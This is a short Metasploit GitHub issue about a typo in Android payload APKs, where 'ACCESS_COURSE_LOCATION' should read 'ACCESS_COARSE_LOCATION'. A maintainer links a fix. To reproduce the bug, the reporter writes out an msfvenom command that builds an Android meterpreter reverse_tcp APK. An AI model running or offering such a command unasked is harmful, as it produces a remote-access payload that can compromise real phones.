### ISSUE TITLE
Wrong requested Android permission

### ISSUE THREAD

**Issue by PsychoBit** [rapid7/metasploit-framework#7780]
Creating an Android APK payload with msfvenom tool
`msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=319 > bugged-app.apk`
and decompiling the output with `apktool d bugged-app.apk`, the seventh line of the "AndroidManifest.xml" file will request for an inexistent Android permission called "ACCESS_COURSE_LOCATION", maybe a typo written instead of the [right one](https://developer.android.com/reference/android/Manifest.permission.html#ACCESS_COARSE_LOCATION) "ACCESS_COARSE_LOCATION"

Using Metasploit v4.13.8-dev

**Comment by bcook-r7** [comment]
Of coarse! Fix is here: https://github.com/rapid7/metasploit-payloads/pull/161  - thanks!
